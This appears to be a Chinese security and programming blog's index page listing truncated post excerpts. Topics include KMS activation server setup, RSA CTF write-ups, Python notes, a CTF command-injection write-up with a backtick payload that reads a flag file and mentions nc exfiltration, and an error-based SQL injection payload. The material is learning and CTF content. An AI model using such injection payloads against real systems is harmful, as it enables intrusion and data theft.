由   Archerx  撰写于    浏览:62  评论:3
Key Management Service(简称:KMS),这个功能是在Windows Vista之后的产品中的一种新型产品激活机制。我们可以利用手里闲置的VPS安装vlmcsd来搭建KMS激活服务器,这篇文章以CentOS为例,当然vlmcsd并不局限限于CentOS,如Ubuntu、Windows、MacOS等都可以安装服务端,原理和方法相同[...]

由   Archerx  撰写于    浏览:9  评论:0
medium RSA给出两个文件:flag.enc pubkey.pem基本方法分解公钥得到N、E@Archerx MINGW64 ~/Desktop/mediumRSA $ openssl rsa -pubin -text -modulus -in pubkey.pem Public-Key: (256 bit) Modulus: 00:[...]

由   Archerx  撰写于    浏览:3  评论:0
如果dp,dq,p,q泄露,就算e,d都保密,也可以被解密而这种方法也存在于实际中,是用于RSA的加快解密的,专业称为RSA_CRT leaks如果泄露了(dp,dq,q,p,c)题目为例dp= 90494486973243104756298311175705002887155440121025946664275790548694955799661[...]

由   Archerx  撰写于    浏览:14  评论:0
前言最近看了一下python面向对象,其实还是c++/java那套,继承、多态……但是python中有一些特殊的关于面向对象的。@staticmethod装饰器通过@staticmethod装饰器即可把其装饰的方法变为一个静态方法,什么是静态方法呢?其实不难理解,普通的方法,可以在实例化后直接调用,并且在方法里可以通过self.调用实例变量或类变量[...]

由   Archerx  撰写于    浏览:6  评论:0
前言一共三道web……第一道没啥好说的第三道也是python代码审计,记得是过滤了空格、……具体也忘了,空格用注释符绕过,挺简单的就不说了计算器就是一个命令行注入开始尝试fantanshell不成功,尝试nc传输数据成功http://202.120.7.205:60003/index.php?calc=`cat there_1s_4_fl4g |[...]

由   Archerx  撰写于    浏览:3  评论:0
前言主要总结multiprocesssing 这个库的使用,其他多线程库感觉不好用……进程池(pool)相对于自己手写,还是这个进程池最好用,完全不用担心调度问题。Pool 可以提供指定数量的进程供用户使用,默认是 CPU 核数。当有新的请求提交到 Poll 的时候,如果池子没有满,会创建一个进程来执行,否则就会让该请求等待。Pool 对象调用 [...]

由   Archerx  撰写于    浏览:4  评论:0
注:全程有大佬带飞注入点:`/news_query/post.php` Type: `error-based` Payload: `where=title&keyword=1' AND (SELECT 9096 FROM(SELECT COUNT(*),CONCAT(0x7176707171,(SELECT (ELT(9096=9096[...]